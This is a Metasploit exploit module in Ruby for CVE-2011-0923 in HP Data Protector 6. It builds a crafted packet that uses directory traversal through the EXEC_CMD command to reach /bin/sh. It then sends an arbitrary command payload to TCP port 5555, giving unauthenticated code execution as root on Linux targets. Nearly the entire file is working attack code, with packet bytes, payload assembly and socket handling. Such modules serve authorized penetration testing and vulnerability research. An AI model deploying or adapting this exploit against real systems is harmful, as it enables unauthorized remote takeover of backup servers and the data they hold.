##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'HP Data Protector 6 EXEC_CMD Remote Code Execution',
        'Description' => %q{
          This exploit abuses a vulnerability in the HP Data Protector service. This
          flaw allows an unauthenticated attacker to take advantage of the EXEC_CMD
          command and traverse back to /bin/sh, this allows arbitrary remote code
          execution under the context of root.
        },
        'Author' => [
          'ch0ks', # poc
          'c4an',           # msf poc
          'wireghoul',      # Improved msf
          'Javier Ignacio'  # Verified on A06.20
        ],
        'References' => [
          [ 'CVE', '2011-0923'],
          [ 'OSVDB', '72526'],
          [ 'ZDI', '11-055'],
          [ 'URL', 'http://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux'],
          [ 'URL', 'https://community.rapid7.com/thread/2253' ]
        ],
        'DisclosureDate' => '2011-02-07',
        'Platform' => %w{linux unix},
        'Arch' => ARCH_CMD,
        'Payload' => {
          'Space' => 10000,
          'DisableNops' => true,
          'Compat' => { 'PayloadType' => 'cmd' }
        },
        'Targets' => [
          [ 'HP Data Protector 6.10/6.11/6.20 on Linux', {}]
        ],
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([Opt::RPORT(5555),])
  end

  def exploit
    user = rand_text_alpha(4)

    packet = "\x00\x00\x00\xa4\x20\x32\x00\x20"
    packet << user * 2
    packet << "\x00\x20\x30\x00\x20"
    packet << "SYSTEM"
    packet << "\x00\x20\x63\x34\x61\x6e"
    packet << "\x20\x20\x20\x20\x20\x00\x20\x43\x00\x20\x32\x30\x00\x20"
    packet << user
    packet << "\x20\x20\x20\x20\x00\x20"
    packet << "\x50\x6f\x63"
    packet << "\x00\x20"
    packet << "NTAUTHORITY"
    packet << "\x00\x20"
    packet << "NTAUTHORITY"
    packet << "\x00\x20"
    packet << "NTAUTHORITY"
    packet << "\x00\x20\x30\x00\x20\x30\x00\x20"
    packet << "../../../../../../../../../../"

    shell_mio = "bin/sh"

    shell = shell_mio
    shell << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    shell << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    shell << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    shell << payload.encoded
    shell << "\n"

    sploit = packet + shell

    begin
      print_status("Sending our commmand...")
      connect
      sock.put(sploit)
      print_status("Waiting ...")
      handler

      # Read command output from socket if cmd/unix/generic payload was used
      if (datastore['CMD'])
        res = sock.get_once(-1, 10)
        print_status(res.to_s) if not res.empty?
      end
    rescue
      print_error("Error in connection or socket")
    ensure
      disconnect
    end
  end
end